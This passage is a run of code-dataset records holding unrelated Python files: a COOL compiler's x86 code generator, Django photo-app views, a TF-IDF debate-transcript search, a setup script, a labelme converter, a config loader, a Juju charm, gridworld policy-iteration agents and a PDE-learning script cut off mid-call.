+ \"subq $8, %rsp\" + NEWLINE\n \n stack_count = 0\n for i, arg in reversed(list(enumerate(dispatchExpr.arguments))):\n arg_code, _ = self.code_genExpr(c, method, num_locals, arg, True)\n\n # ret += self.caller_save_push()\n ret += arg_code\n # ret += self.caller_save_pop()\n\n if i < 5: \n # first reg is saved for object (could be SELF or other type)\n ret += TAB + \"movq %rax, {}\".format(self.param_regs[i + 1]) + NEWLINE\n else:\n ret += TAB + \"pushq %rax\" + NEWLINE\n stack_count += 1\n \n\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n ret += TAB + \"popq %rdi\" + NEWLINE\n ret += TAB + \"movq {}(%rdi), {}\".format(DISP_OFFSET, DISP_FUNC_REG) + NEWLINE\n\n # get the function offset from dispatch table\n if obj_ty == 'Self': obj_ty = c.className\n offset = self.dispatchTable[obj_ty][methodName]['offset']\n \n # use offset to get the appropriate function\n ret += TAB + \"movq {}({}), {}\".format(str(offset), DISP_FUNC_REG, DISP_FUNC_REG) + NEWLINE\n ret += self.genFuncCall('*' + DISP_FUNC_REG)\n\n while stack_count > 0:\n ret += TAB + \"popq %rax\" + NEWLINE\n stack_count -= 1\n\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n ret += TAB + \"popq %rdi\" + NEWLINE\n\n ret_type = str(self.type_scope.lookup(c.className).lookupType(method.methodName).ret_ty)\n\n if not isLvalue and ret_type == 'Int':\n ret += TAB + \"movq {}(%rax), %rax\".format(INTCONST_VALOFFSET) + NEWLINE\n\n\n return ret, ret_type\n\n def code_genAssignment(self, c: 'Class', method, num_locals, assignExpr, isLvalue):\n ret = \"\"\n\n lhs = assignExpr.id\n rhs_code, rhs_ty = self.code_genExpr(c, method, num_locals, assignExpr.expr, True)\n\n ret += rhs_code\n\n # if it is in scope\n offset = self.scope.lookup_offset(lhs)\n if offset:\n ret += TAB + \"movq %rax, {}(%rbp)\".format(offset) + NEWLINE\n return ret, rhs_ty\n\n if lhs in self.attrtable[c.className]:\n attr_offset = self.attrtable[c.className][lhs]['offset']\n\n # -40 is the offset to access self obj\n ret += TAB + \"movq {}(%rbp), {}\".format(STACK_SELF_OFFST, OBJ_ADDR_REG) + NEWLINE\n ret += TAB + \"movq %rax, {}({})\".format(attr_offset, OBJ_ADDR_REG) + NEWLINE\n\n return ret, rhs_ty\n\n def gen_selfObjAddress(self):\n return TAB + \"movq {}(%rbp), {}\".format(OBJ_ADDR_REG) + NEWLINE\n\n def genMethodEntry(self):\n ret = TAB + \"pushq %rbp\" + NEWLINE + TAB + \"movq %rsp, %rbp\" + NEWLINE\n for reg in self.callee_save:\n ret += TAB + \"pushq {}\".format(reg) + NEWLINE\n return ret\n\n def genMethodExit(self):\n ret = \"\"\n for reg in list(reversed(self.callee_save)):\n ret += TAB + \"popq {}\".format(reg) + NEWLINE\n\n return ret + TAB + \"leave\" + NEWLINE + TAB + \"ret\" + NEWLINE\n\n def genFuncCall(self, name):\n ret = \"\"\n\n ret += self.caller_save_push()\n \n ret += TAB + \"callq {}\".format(name) + NEWLINE\n\n ret += self.caller_save_pop()\n\n return ret\n\n def caller_save_push(self):\n ret = \"\"\n\n for reg in self.caller_save:\n ret += TAB + \"pushq {}\".format(reg) + NEWLINE\n\n \n # there are 7 caller save regs, so we need 8 more bytes to \n # make sure that the stack is 16 bytes aligned\n ret += TAB + \"subq $8, %rsp\" + NEWLINE\n\n return ret\n\n def caller_save_pop(self):\n\n ret = \"\"\n ret += TAB + \"addq $8, %rsp\" + NEWLINE\n\n\n for reg in list(reversed(self.caller_save)):\n ret += TAB + \"popq {}\".format(reg) + NEWLINE\n\n return ret\n\n\n\n \n\nif __name__ == \"__main__\":\n \n import sys\n import os\n import glob\n from parser import make_parser\n from os.path import basename\n import subprocess\n\n root_path = 
'/Users/Jack/Documents/programming/python/coolCompiler'\n test_folder = root_path + '/Tests'\n\n parser = make_parser()\n\n # filename = sys.argv[1]\n filename = \"Tests/palindrome.cl\"\n\n with open(filename) as f:\n cool_program_code = f.read()\n\n parse_result = parser.parse(cool_program_code)\n type_scope = parse_result.typecheck()\n cgen = CGen(parse_result, type_scope)\n code = cgen.code_gen()\n\n assembly_name = os.path.splitext(basename(filename))[0] \n with open(\"x86/\" + assembly_name + \".s\", 'w') as f:\n print(\"writing into file {}.s\".format(assembly_name))\n f.write(code)\n\n\n print(subprocess.check_output(\n [\n \"clang\", \n \"runtime/runtime.c\", \n \"runtime/startup.s\", \n \"x86/{}.s\".format(assembly_name),\n \"-o\",\n \"bin/{}\".format(assembly_name)\n\n ]))\n\n ","sub_path":"src/cool_codegen.py","file_name":"cool_codegen.py","file_ext":"py","file_size_in_byte":35098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"538912573","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .forms import NewpostForm,NewProfileForm\nfrom .models import Image,Profile\nfrom django.http import HttpResponse\n\n\n@login_required(login_url='/accounts/login/')\ndef welcome(request):\n images=Image.objects.all()\n return render(request,'welcome.html',{ 'images':images})\n\n@login_required(login_url='/accounts/login/')\ndef new_post(request):\n current_user = request.user\n if request.method == 'POST':\n form = NewpostForm(request.POST, request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.user = current_user\n \n image.save()\n return redirect('welcome')\n\n else:\n form = NewpostForm()\n return render(request, 'new_post.html', {\"form\": form})\n@login_required(login_url='/accounts/login/')\ndef addprofile(request):\n current_user = request.user\n if request.method == 'POST':\n form = NewProfileForm(request.POST, request.FILES)\n if form.is_valid():\n profile = form.save(commit=False)\n profile.user = current_user\n \n profile.save()\n return redirect('viewprofile')\n\n else:\n form = NewProfileForm\n return render(request, 'profile.html', {\"form\": form})\n@login_required(login_url='/accounts/login/')\ndef viewprofile(request):\n current_user = request.user\n profile = Profile.objects.filter(user = current_user).first()\n return render(request,'viewprofile.html',{'profile':profile})\n# def search_results(request):\n\n# if 'user' in request.GET and request.GET[\"user\"]:\n# search_term = request.GET.get(\"user\")\n# user = User.search_by_username(search_term)\n# message = f\"{search_term}\"\n\n# return render(request, 'all_photos/search.html',{\"message\":message,\"image\":images})\n\n# else:\n# message = \"You haven't searched for any term\"\n# return render(request, 'all_photos/search.html',{\"message\":message})\ndef search_results(request):\n\n if 'user' in request.GET and request.GET[\"user\"]:\n search_term = request.GET.get(\"user\")\n searched_users = Image.search_by_user(search_term)\n message = f\"{search_term}\"\n\n return render(request, 'all-photos/search.html',{\"message\":message,\"users\": searched_users})\n\n else:\n message = \"You haven't searched for any term\"\n return render(request, 
'all-photos/search.html',{\"message\":message})","sub_path":"instagram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"142437428","text":"import pandas as pd\nimport re\nimport numpy as np\nimport math\nfrom app.irsystem.models.BingImageSearchv7 import image_search\n\ndef tokenize(text):\n text = text.lower()\n return re.findall(\"[a-z]+\", text)\n\ndocs = []\ndata = pd.read_csv('app/data/debate_transcripts_v5.csv')\nfor i in range(0, len(data['speech'])):\n docs.append(dict())\n docs[i]['speaker'] = data['speaker'][i]\n docs[i]['text'] = tokenize(data['speech'][i])\n\ndef build_inverted_index(msgs):\n result = dict()\n for i in range(0, len(msgs)):\n for word in msgs[i]['text']:\n if word in result:\n if i in result[word]:\n result[word][i] += 1\n else:\n result[word][i] = 1\n else:\n result[word] = dict()\n result[word][i] = 1\n tups = dict()\n for i in result:\n tups[i] = []\n for key in result[i]:\n tups[i].append((key, result[i][key]))\n return tups\n\ninv_idx = build_inverted_index(docs)\n\ndef compute_idf(inv_idx, n_docs, min_df=100, max_df_ratio=0.3):\n result = dict()\n max_df = n_docs * max_df_ratio\n for i in inv_idx:\n if len(inv_idx[i]) >= min_df and len(inv_idx[i]) <= max_df:\n result[i] = math.log(n_docs / (1 + len(inv_idx[i])), 2)\n \n return result\n\nidf = compute_idf(inv_idx, len(data['speech']))\n\ndef compute_doc_norms(index, idf, n_docs):\n norms = np.zeros(n_docs)\n for i in index:\n if i in idf:\n for j in range(0, len(index[i])):\n norms[index[i][j][0]] += (index[i][j][1] * idf[i])**2\n for i in range(0, len(norms)):\n norms[i] = norms[i]**.5\n return norms\n\n\n\ninv_idx = {key: val for key, val in inv_idx.items()\n if key in idf} \n\ndoc_norms = compute_doc_norms(inv_idx, idf, len(data['speech']))\n\n\ndef index_search(q, index, idf, doc_norms, tokenizer=tokenize): \n #q = tokenizer(query.lower())\n q_words = dict()\n for i in q:\n if i in q_words:\n q_words[i] += 1\n else:\n q_words[i] = 1\n q_norm = 0\n for i in q_words:\n if i in idf:\n q_norm += (q_words[i] * idf[i])**2\n q_norm = q_norm**.5\n \n scores = dict()\n for word in q:\n if word in idf:\n for doc in index[word]:\n if doc[0] in scores:\n scores[doc[0]] += q_words[word] * idf[word] * doc[1] * idf[word]\n else:\n scores[doc[0]] = q_words[word] * idf[word] * doc[1] * idf[word]\n result = []\n for i in scores:\n result.append((scores[i] / (q_norm * doc_norms[i]), i))\n \n results = sorted(result, reverse = True)\n \n \n return results\n\ndef sim_list(doc_id): #produces 5 most similar docs to doc_id\n sim_list = index_search(docs[doc_id]['text'], inv_idx, idf, doc_norms)\n result = []\n for i in range(0, 5):\n result.append(sim_list[i][1])\n return result\n\ndef get_3_sim_cosine(str):\n q = tokenize(str.lower())\n final_data = []\n sim_list = index_search(q, inv_idx, idf, doc_norms)\n for i in range(1, 4):\n idx = sim_list[i][1]\n obj = {\"score\": sim_list[i][0], \"debate_name\": data['debate_name'][idx], \"debate_date\": data['debate_date'][idx], \"speaker\":data['speaker'][idx], \"speech\":data['speech'][idx], \"link\": data[\"transcript_link\"][idx] }\n final_data.append(obj)\n return final_data\n\ndef get_top_n(query, n, politicians):\n #query: query string\n #n: number (int) of desired results\n #politicians: string\n \n check_pol = True\n if n:\n n=int(n)\n else:\n n=10\n\n if not politicians and not query:\n return\n\n if not query:\n return\n\n if not politicians:\n 
check_pol = False\n else:\n politicians = [p.strip() for p in politicians.split(\",\")]\n input_politicians = []\n for politician in politicians:\n item = politician.split()\n word = \"\"\n for name in item:\n word += name.capitalize() + \" \"\n input_politicians.append(word.strip())\n input_politicians = set(input_politicians)\n # print(input_politicians)\n\n q = tokenize(query)\n\n sim_list = index_search(q, inv_idx, idf, doc_norms)\n count = 0\n i = 0\n final_data = []\n while count < n and i < len(sim_list):\n idx = sim_list[i][1]\n if(check_pol):\n if data['speaker'][idx] in input_politicians:\n obj = {\"score\": sim_list[i][0], \"debate_name\": data['debate_name'][idx], \"debate_date\": data['debate_date'][idx], \"speaker\":data['speaker'][idx], \"speech\":data['speech'][idx], \"link\": data[\"transcript_link\"][idx], \"image\":image_search(data['speaker'][idx])}\n final_data.append(obj)\n count += 1\n else:\n obj = {\"score\": sim_list[i][0], \"debate_name\": data['debate_name'][idx], \"debate_date\": data['debate_date'][idx], \"speaker\":data['speaker'][idx], \"speech\":data['speech'][idx], \"link\": data[\"transcript_link\"][idx], \"image\":image_search(data['speaker'][idx]) }\n final_data.append(obj)\n count += 1\n i += 1\n return final_data","sub_path":"app/irsystem/models/cosine_sim.py","file_name":"cosine_sim.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"352075645","text":"\"\"\"\nVarious checking\n\"\"\"\nimport os\n\ndef check():\n \"\"\"\n checks difflibjs is present\n \"\"\"\n path = os.path.abspath(os.path.dirname(__file__))\n fold = os.path.join(path, \"temp_difflibjs\")\n r = os.path.exists(fold)\n if not r : return r\n f = os.path.join(fold, \"jsdifflib.zip\")\n r = os.path.exists(f)\n if not r : return r\n size = os.stat(f).st_size\n return size > 0\n \n","sub_path":"src/pyquickhelper/sync/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389888177","text":"from __future__ import print_function\n\nfrom distutils.core import Extension\nimport sys, os.path, os\nfrom distutils import sysconfig\n\n# BUILD should be 'debug', 'profile' or 'release'\nBUILD = 'release'\n\ntry:\n import numpy\nexcept ImportError:\n print(\"Numpy was not found. It may not be installed or it may not be on your PYTHONPATH. Multidrizzle requires numpy v 1.0.2 or later.\\n\")\n raise\n\n# This is the case for building as part of stsci_python\nif os.path.exists('pywcs'):\n # use the not-installed-yet source tree for pywcs\n pywcsincludes = [os.path.join('pywcs', 'src')]\n candidates = []\n for path in os.listdir('pywcs'):\n if path.startswith('wcslib'):\n candidates.append(path)\n if len(candidates) == 1:\n pywcsincludes.append(os.path.join('pywcs', candidates[0], 'C'))\n else:\n raise SystemExit(\"No suitable version of wcslib found in the current distribution of pywcs\")\nelse:\n try:\n from astropy import wcs as pywcs\n pywcslib = pywcs.__path__[0]\n pywcsincludes = [os.path.join(pywcslib, 'include'),\n os.path.join(pywcslib, 'include', 'wcslib')]\n except ImportError:\n raise ImportError(\"PyWCS was not found. It may not be installed or it may not be on your PYTHONPATH. 
\\nPydrizzle requires pywcs 1.4 or later.\\n\")\n\nif numpy.__version__ < \"1.0.2\":\n raise SystemExit(\"Numpy 1.0.2 or later required to build Multidrizzle.\")\n\nprint(\"Building C extensions using NUMPY.\")\n\nnumpyinc = numpy.get_include()\n\npythonlib = sysconfig.get_python_lib(plat_specific=1)\npythoninc = sysconfig.get_python_inc()\nver = sysconfig.get_python_version()\npythonver = 'python' + ver\n\nif sys.platform != 'win32':\n EXTRA_LINK_ARGS = []\nelse:\n EXTRA_LINK_ARGS = ['/NODEFAULTLIB:MSVCRT' ] # , pywcslib+'/_pywcs.dll']\n EXTRA_LINK_ARGS = []\n\n\ndef getNumpyExtensions():\n define_macros = [('PYDRIZZLE', None)]\n undef_macros = []\n EXTRA_COMPILE_ARGS = []\n if BUILD.lower() == 'debug':\n define_macros.append(('DEBUG', None))\n undef_macros.append('NDEBUG')\n if not sys.platform.startswith('sun') and \\\n not sys.platform == 'win32':\n EXTRA_COMPILE_ARGS.extend([\"-fno-inline\", \"-O0\", \"-g\"])\n elif BUILD.lower() == 'profile':\n define_macros.append(('NDEBUG', None))\n undef_macros.append('DEBUG')\n if not sys.platform.startswith('sun') and \\\n not sys.platform == 'win32':\n EXTRA_COMPILE_ARGS.extend([\"-O3\", \"-g\"])\n elif BUILD.lower() == 'release':\n # Define ECHO as nothing to prevent spurious newlines from\n # printing within the libwcs parser\n define_macros.append(('NDEBUG', None))\n undef_macros.append('DEBUG')\n else:\n raise ValueError(\"BUILD should be one of 'debug', 'profile', or 'release'\")\n\n\n ext = [Extension(\"drizzlepac.cdriz\",['src/arrdrizmodule.c',\n 'src/cdrizzleblot.c',\n 'src/cdrizzlebox.c',\n 'src/cdrizzleio.c',\n 'src/cdrizzlemap.c',\n 'src/cdrizzleutil.c',\n 'src/cdrizzlewcs.c'],\n define_macros=define_macros,\n undef_macros=undef_macros,\n include_dirs=[pythoninc] + [numpyinc] + \\\n pywcsincludes,\n extra_link_args=EXTRA_LINK_ARGS,\n extra_compile_args=EXTRA_COMPILE_ARGS,\n # not needed on windows; not needed on mac\n # libraries=['m']\n )]\n\n return ext\n\n\npkg = \"drizzlepac\"\n\nsetupargs = {\n\n 'version' : '1.1.1dev',\n 'description' : \"C-based MultiDrizzle\",\n 'author' : \"Megan Sosey, Warren Hack, Christopher Hanley, Chris Sontag, Mihai Cara\",\n 'author_email' : \"help@stsci.edu\",\n 'license' : \"http://www.stsci.edu/resources/software_hardware/pyraf/LICENSE\",\n 'platforms' : [\"Linux\",\"Solaris\",\"Mac OS X\",\"Win\"],\n 'data_files' : [( pkg+\"/pars\", ['lib/drizzlepac/pars/*']),\n ( pkg+\"/htmlhelp/_images/math\", ['lib/drizzlepac/htmlhelp/_images/math/*']),\n ( pkg+\"/htmlhelp/_images\", ['lib/drizzlepac/htmlhelp/_images/*.*']),\n ( pkg+\"/htmlhelp/_sources\", ['lib/drizzlepac/htmlhelp/_sources/*']),\n ( pkg+\"/htmlhelp/_static\", ['lib/drizzlepac/htmlhelp/_static/*']),\n ( pkg+\"/htmlhelp\", ['lib/drizzlepac/htmlhelp/*.html']),\n ( pkg, ['lib/drizzlepac/*.help'])],\n 'scripts' : [\"scripts/mdriz\",\"scripts/resetbits\",\"scripts/updatenpol\",\"scripts/runastrodriz\"] ,\n 'ext_modules' : getNumpyExtensions(),\n 'package_dir' : { 'drizzlepac' : 'lib/drizzlepac', },\n\n }\n\n","sub_path":"defsetup.py","file_name":"defsetup.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313523167","text":"import labelme\nimport os, sys\n\n\n\n\nif __name__ == \"__main__\":\n mode = 'val'\n kind = 'U100'\n path=f\"/home/rico-li/Job/豐興鋼鐵/data/clean_data_20frames/{kind}/images/{mode}\"\n dest = f\"/home/rico-li/Job/豐興鋼鐵/data/clean_data_20frames/{kind}/annotations/{mode}\"\n dirs = os.listdir(path)\n dirs = [dir for dir in dirs if 
dir.endswith('.json')]\n dirs = [os.path.join(path,dir) for dir in dirs]\n \n\n for i, item in enumerate(dirs):\n json_name = item.split('/')[-1].split('.')[0]\n os.system(\"labelme_json_to_dataset \"+item+\" --save \"+dest)","sub_path":"json_to_dataset.py","file_name":"json_to_dataset.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644812814","text":"import os, sys\r\nimport json\r\n\r\nclass config():\r\n\t\r\n\tdef __init__(self):\r\n\t\t\r\n\t\tself.debugEnabled = False\r\n\t\tself.params = {}\r\n\t\tself.configured = False\r\n\t\r\n\tdef param(self, *args):\r\n\t\ttry:\r\n\t\t\tif len(args) == 1:\r\n\t\t\t\tif args[0] in self.params:\r\n\t\t\t\t\treturn self.params[args[0]]\r\n\t\t\tif len(args) == 2:\r\n\t\t\t\tif args[0] in self.params:\r\n\t\t\t\t\tif args[1] in self.params[args[0]]:\r\n\t\t\t\t\t\treturn self.params[args[0]][args[1]]\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\treturn None\r\n\r\n\t# load json config file from supplied commandline\r\n\t# argument or from default config file name with\r\n\t# format of {app_path}/{app_base_name}.cfg\r\n\tdef load(self, configFile=None):\r\n\t\t\r\n\t\t# TODO account for a configFile being\r\n\t\t# passed in\r\n\t\t\r\n\t\t# default to commandline arguments if a\r\n\t\t# filename is not supplied\r\n\t\tif configFile == None:\r\n\t\t\tpass\r\n\t\t\t\r\n\t\t# calculate application base name and real application path\r\n\t\t# uses system argument which is present regardless of\r\n\t\t# supplied arguments\r\n\t\te = sys.argv[0].split(\"/\")\r\n\t\tself.appFullName = e[len(e)-1]\r\n\t\tself.appBaseName = self.appFullName\r\n\t\tif \".\" in self.appBaseName:\r\n\t\t\te = self.appBaseName.split('.')\r\n\t\t\tself.appBaseName = e[len(e)-2]\r\n\t\tself.appPath = os.path.dirname(os.path.realpath(self.appFullName))\r\n\t\t\r\n\t\t# default stateCacheFile path\r\n\t\t# format: {application_path}/{application_base_name}.cache\r\n\t\tself.stateCacheFile = os.path.join(self.appPath, \"{0}.cache\".format(self.appBaseName))\r\n\t\t\r\n\t\tif self.debugEnabled:\r\n\t\t\tprint(\"sys.argv[0]: {0}\".format(sys.argv[0]))\r\n\t\t\tprint(\"realpath(sys.argv[0]): {0}\".format(os.path.realpath(sys.argv[0])))\r\n\t\t\tprint(\"dirname(realpath(sys.argv[0])): {0}\".format(os.path.dirname(os.path.realpath(sys.argv[0]))))\r\n\t\r\n\t\t\tprint(\"script full name: {0}\".format(self.appFullName))\r\n\t\t\tprint(\"script base name: {0}\".format(self.appBaseName))\r\n\t\t\tprint(\"script location: {0}\".format(self.appPath))\r\n\t\t\tprint(\"stateCacheFile: {0}\".format(self.stateCacheFile))\r\n\t\t\r\n\t\t# Check for commandline arguments\r\n\t\t# Load config\r\n\t\tif (len(sys.argv) >= 2):\r\n\t\t\t\r\n\t\t\t# build a path from supplied argument accounting for\r\n\t\t\t# referencing local file versus remote file (./ vs full path /)\r\n\t\t\tself.configPath = sys.argv[1]\r\n\t\t\tif self.configPath[:2] != \"./\":\r\n\t\t\t\tself.configPath = os.path.join(self.appPath, self.configPath)\r\n\r\n\t\t\t# Supplied config path is not a real file or cannot be accessed\t\r\n\t\t\tif not os.path.isfile(self.configPath):\r\n\t\t\t\tprint(\"cannot access configuration file {0}\".format(sys.argv[1]))\r\n\t\t\t\texit()\r\n\t\telse:\r\n\t\t\t\r\n\t\t\t# build a default config file and path based on script base name\r\n\t\t\tself.configPath = os.path.join(self.appPath, \"{0}.cfg\".format(self.appBaseName))\r\n\t\t\t\r\n\t\t\t# the default config file does not exist or could not be 
accessed\r\n\t\t\tif not os.path.isfile(self.configPath):\r\n\t\t\t\tprint(\"needs config; e.g. {0}.cfg\".format(self.appBaseName))\r\n\t\t\t\texit()\r\n\t\t\t\r\n\t\t# Try to process config file\r\n\t\ttry:\r\n\t\t\twith open(self.configPath) as data_file:\r\n\t\t\t\tself.params = json.load(data_file)\r\n\t\t\tprint(\"loaded config from: {0}\".format(self.configPath))\r\n\t\texcept:\r\n\t\t\tprint(\"unable to process configuration file {0}\".format(self.configPath))\r\n\t\t\tprint(sys.exc_info()[0])\r\n\t\t\traise\r\n\t\t\r\n\t\t# Pass in the fruits of our path wrangling efforts\r\n\t\tself.params[\"appFullName\"] = self.appFullName\r\n\t\tself.params[\"appBaseName\"] = self.appBaseName\r\n\t\tself.params[\"appPath\"] = self.appPath\r\n\t\tif \"stateCacheFile\" not in self.params:\r\n\t\t\tself.params[\"stateCacheFile\"] = self.stateCacheFile\r\n\r\n\t\tself.configured = True\r\n\t\treturn False","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"405902565","text":"from charms.reactive import (when, when_any, when_not, when_none,\n set_flag, clear_flag, hook)\n\nfrom charmhelpers.core import hookenv\n\nfrom charms.layer.jmxexporter import JMXExporter\n\n\ndef refresh():\n jmx = JMXExporter()\n\n clear_flag('jmxexporter.service-installed')\n\n if not hookenv.config()['config']:\n hookenv.status_set('waiting', 'waiting for config')\n\n if jmx.is_running():\n jmx.stop()\n\n return\n\n hookenv.status_set('maintenance', 'refreshing service')\n jmx.install()\n jmx.restart()\n hookenv.status_set('active', 'running')\n set_flag('jmxexporter.service-installed')\n\n\n@when_not('jmxexporter.service-installed')\ndef waiting():\n refresh()\n\n\n@hook('config-changed')\ndef config_changed():\n refresh()\n\n\n@when_any('host-system.available', 'host-system.connected')\n@when_not('jmx.connected')\ndef host_added():\n refresh()\n set_flag('jmx.connected')\n\n\n@when_none('host-system.available', 'host-system.connected')\n@when('jmx.connected')\ndef host_removed():\n refresh()\n clear_flag('jmx.connected')\n","sub_path":"charm/jmx-exporter/reactive/jmxexporter.py","file_name":"jmxexporter.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"631650340","text":"import matplotlib\nimport pdb\nmatplotlib.use(\"TkAgg\")\nimport gym\nimport gridworld\nfrom gym import wrappers, logger\nimport numpy as np\nfrom policy_finder import valueIteration, policyIteration\nimport copy\nimport sys\nfrom utils import drawValuePolicyMap\nimport matplotlib.pyplot as plt\n\n\nclass RandomAgent(object):\n \"\"\"The world's simplest agent!\"\"\"\n\n def __init__(self, action_space):\n self.action_space = action_space\n\n def act(self, observation, reward, done):\n return self.action_space.sample()\n\nclass ValueIterationAgent(object):\n \"\"\"agent that follows the value iteration policy\"\"\"\n def __init__(self, statedic, mdp, epsilon = 0.01, gamma= 0.95):\n self.policy, self.value = valueIteration(statedic, mdp, epsilon, gamma)\n def act(self, observation):\n return self.policy[str(observation.tolist())]\n\nclass PolicyIterationAgent(object):\n def __init__(self, statedic, mdp, epsilon = 0.01, gamma= 0.95):\n self.policy, self.value = policyIteration(statedic, mdp, epsilon, gamma)\n def act(self, observation):\n return self.policy[str(observation.tolist())]\nif __name__ == '__main__':\n\n\n env = 
gym.make(\"gridworld-v0\")\n env.seed(0) # Initialise le seed du pseudo-random\n\n\n # Faire un fichier de log sur plusieurs scenarios\n outdir = 'gridworld-v0/random-agent-results'\n envm = wrappers.Monitor(env, directory=outdir, force=True, video_callable=False)\n # for each type of cases we associate a reword\n env.setPlan(\"gridworldPlans/plan\" +sys.argv[1]+ \".txt\", {0: -0.001, 3: 1, 4: 1, 5: -1, 6: -1})\n\n # statedict : key : string of state \"[[], []...] \" : int number of the state # nombre de clé >\n # mdp { string of state : {int de l'action : [(proba, futureState, reward, done)] } } # nombre de clé\n statedic, mdp = env.getMDP() # recupere le mdp , statedic\n # policy : { state : action}\n\n agent = PolicyIterationAgent(statedic, mdp, 0.01, gamma = 0.95)\n #fig = drawValuePolicyMap(agent)\n #plt.savefig(f\"./graphs/plan{sys.argv[1]}_epsilon0.01_gamma0.95.png\")\n env.seed() # Initialiser le pseudo aleatoire\n episode_count = int(sys.argv[2])\n reward = 0\n done = False\n rsum = 0\n FPS = 0.0001\n for i in range(episode_count):\n obs = envm.reset()\n env.verbose = (i % 100 == 0 and i > 0) # afficher 1 episode sur 100\n if env.verbose:\n env.render(FPS)\n j = 0\n rsum = 0\n while True:\n action = agent.act(obs)\n obs, reward, done, _ = envm.step(action)\n rsum += reward\n j += 1\n if env.verbose:\n env.render(FPS)\n if done:\n print(\"Episode : \" + str(i) + \" rsum=\" + str(rsum) + \", \" + str(j) + \" actions\")\n break\n print(\"done\")\n env.close()\n","sub_path":"tme3/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206851122","text":"from __init__ import *\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n## for Palatino and other serif fonts use:\n# rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\nfrom data_analysis import Analyze\nfrom mc2pdf import MCprocessing\nfrom datamanage import DataIO\nfrom montecarlo import MonteCarlo\nfrom analytical_solutions import AnalyticalSolution, gaussian\nfrom mc2pdf import MCprocessing\nfrom pdfsolver import PdfGrid\nfrom visualization import Visualize\nfrom Learning import PDElearn\nfrom helper_functions import *\nimport numpy as np\nimport pdb\nimport time\n\n\nsave = True\ncheckExistence = True\n# plotpdf = True\nprintlearning = True\nsavenameMC = 'advection_reaction_randadv_analytical_712'+'.npy'\ncase = 'advection_reaction_randadv_analytical'\n\n# Read MC simulations\nD = DataIO(case=case, directory=MCDIR)\nfu, gridvars, ICparams = D.loadSolution(savenameMC)\nnum_realizations = ICparams['num_realizations']\n\n####################### KDE\n\nnu = 200\nu_margin = -1e-10\nbandwidth = 'scott'\ndistribution = 'PDF'\n\n####################### Learning\n\n# Adjust Size\npt = 1\npx = 1\npu = 1\nmu = [0.2, 1]\nmx = [0, 1]\nmt = [0, 1]\ncomments \t\t\t= ''\nfeature_opt = '1storder_close'\ntrainratio\t\t\t= 0.9\nnzthresh = 1e-10\ncoeforder = 2\nvariableCoef \t\t= True\nvariableCoefBasis \t= 'simple_polynomial'\nprint_rfeiter\t\t= True\nshuffle\t\t\t\t= False\nnormalize\t\t\t= True\nmaxiter\t\t\t\t= 10000\n\nuse_rfe\t\t\t\t= True\nrfe_alpha \t= 0.001\nRegCoef\t\t\t\t= 0.000005\nLassoType\t\t\t= 'LassoLarsCV'\ncv\t\t\t\t\t= 5\ncriterion\t\t\t= 'aic'\n\n###############################\n\n# coeforder_vec = [2, 1, 0, 3]\nfeature_opt_vec = ['1storder_close', '1storder']\n# LassoType_vec \t= ['LassoCV', 'LarsCV', 'LassoLarsCV', 'LassoLarsIC']\nrfe_alpha_vec\t= [0.000001, 0.000005, 
0.00001, 0.00005, 0.0001, 0.0005, 0.001, 0.005, 0.01]#, 0.05, 0.08]\n\n###############################\n\noutput_VEC = []\nmetadata_VEC = []\nfilename_VEC = []\n\nfor feature_opt in feature_opt_vec:\n\n\toutput_vec = []\n\tmetadata_vec = []\n\tfilename_vec = []\n\n\tfor rfe_alpha in rfe_alpha_vec:\n\t\tprint('---------------------')\n\t\tprint('\\trfe_alpha = ', rfe_alpha)\n\t\tprint('---------------------')\n\n\t\t# BUILD PDF\n\t\tMCprocess = MCprocessing(savenameMC, case=case)\n\t\tsavenamepdf = MCprocess.buildKDE(nu, distribution=distribution, MCcount=num_realizations, save=save, u_margin=u_margin, bandwidth=bandwidth)\n\n\t\t# LEARN\n\t\tdataman = DataIO(case, directory=PDFDIR) \n\t\tfu, gridvars, ICparams = dataman.loadSolution(savenamepdf, array_opt='marginal')\n\n\t\tadjustgrid = {'mu':mu, 'mx':mx, 'mt':mt, 'pu':pu, 'px':px, 'pt':pt}\n\t\tgrid = PdfGrid(gridvars)\n\t\tfu = grid.adjust(fu, adjustgrid)\n\n\n\t\tdifflearn = PDElearn(grid=grid, fu=fu, ICparams=ICparams, scase=case, trainratio=trainratio, verbose=True)\n\t\tfilename = difflearn.fit_sparse(feature_opt=feature_opt, variableCoef=variableCoef, variableCoefBasis=variableCoefBasis, \\\n\t\t variableCoefOrder=coeforder, use_rfe=use_rfe, rfe_alpha=rfe_alpha, nzthresh=nzthresh, maxiter=maxiter, \\\n\t\t LassoType=LassoType, RegCoef=RegCoef, cv=cv, criterion=criterion, print_rfeiter=print_rfeiter, shuffle=shuffle, 